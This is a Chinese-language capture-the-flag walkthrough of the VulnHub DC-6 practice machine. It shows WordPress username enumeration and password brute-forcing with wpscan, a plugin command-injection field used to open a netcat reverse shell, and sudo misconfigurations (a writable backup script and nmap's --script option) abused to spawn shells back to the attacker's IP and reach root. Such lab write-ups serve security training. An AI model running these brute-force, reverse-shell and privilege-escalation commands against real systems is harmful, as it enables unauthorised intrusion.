靶场下载地址:DC: 6 ~ VulnHub
下载镜像(Mirror版本)
下载下来的文件为 .OVA压缩文件,直接导入vmvare指定解压位置即可
网卡设置和攻击机KALI保持一致即可,这里我选择NAT模式
开机,靶场搭建完毕
渗透测试首先明确目标,目标位获得root权限和获得唯一的一个flag
由于不知道靶机IP地址,所以使用nmap扫描整个网段
nmap -sP -T4 192.168.48.0/24
发现136和144两台主机(1,2,254是网关和广播地址)
136是KALI攻击机,所以靶机地址为192.168.48.144
扫描靶机
nmap -sS -p 1-65535 -A 192.168.48.144
开启了22端口,SSH服务,可能存在密码爆破
开启了80端口,存在WEB
访问WEB
和之前的DC-2遇到了同样的问题
需要在kali中编辑hosts文件,添加对应映射
vi /etc/hosts
访问成功
浏览网站,没有发现任何线索,进行敏感目录扫描
扫描到后台
使用kali自带工具wpscan进行扫描
wpscan --url http://wordy/
没有扫描出漏洞
试着爆破一下用户名
wpscan --url http://wordy/ -e u
爆破出五个用户名
将这五个用户名保存到一个文件中
vi dc6user.txt
密码使用kali自带的密码字典
官方给了提示,为了节省密码爆破的时间
cat /usr/share/wordlists/rockyou.txt |grep k01>password.txt
wpscan --url http://wordy/ -U dc6user.txt -P password.txt
如果显示rockyou.txt文件不存在,则需要解压目录下的rockyou.txt.gz文件
cd /usr/share/wordlists
gunzip rockyou.txt.gz
爆破出账号密码mark/helpdesk01
登录成功
找上传点或者命令执行点获得shell
发现lookup可以执行任意命令
输入框长度有限制,可以通过修改前端属性代码修改,也可以通过抓包绕过,这里我们通过抓包绕过
使用nc获得反向shell
在攻击机kali上监听4444端口
nc -lvp 4444
成功获得shell
不是完整shell,使用pyhton中的pty模块反弹一个完整的shell环境
python -c 'import pty;pty.spawn("/bin/bash")'
普通权限
进入家目录看有什么线索
cd /home
ls
在mark家目录下找到/stuff/things-to-do.txt文件
发现新的账号密码graham/GSo7isUM1D4
使用ssh登录
ssh graham@192.168.48.144
没有线索了
进行提权
Linux提权
1、内核提权(脏牛肉提权)
2、suid提权
3、sudo提权
4、数据库提权
sudo -l 查看特权命令
发现jens用户的/home/jens/backups.sh不需要密码就可以执行
将反弹shell的命令写入backups.sh
vi /home/jens/backups.sh
执行命令
sudo -u jens /home/jens/backups.sh
另外打开一个终端,进行监听
nc -lvp 5555
成功获得shell
不是完整shell,使用pyhton中的pty模块反弹一个完整的shell环境
python -c 'import pty;pty.spawn("/bin/bash")'
继续进行提权
sudo -l 查看特权命令
发现不需要密码就可以root权限执行nmap
nmap的--script参数可以执行脚本,脚本是用lua语言写的。
写一个脚本来反弹nc
echo 'os.execute("nc 192.168.48.136 7777 -e /bin/sh")'>root.sh
发现在当前目录下没有写入权限
需要进入临时文件目录/tmp
cd /tmp
另外打开一个shell进行监听
nc -lvp 7777
执行命令
sudo nmap --script=root.sh
成功获得会话,提权成功
cd /root
cat theflag.txt
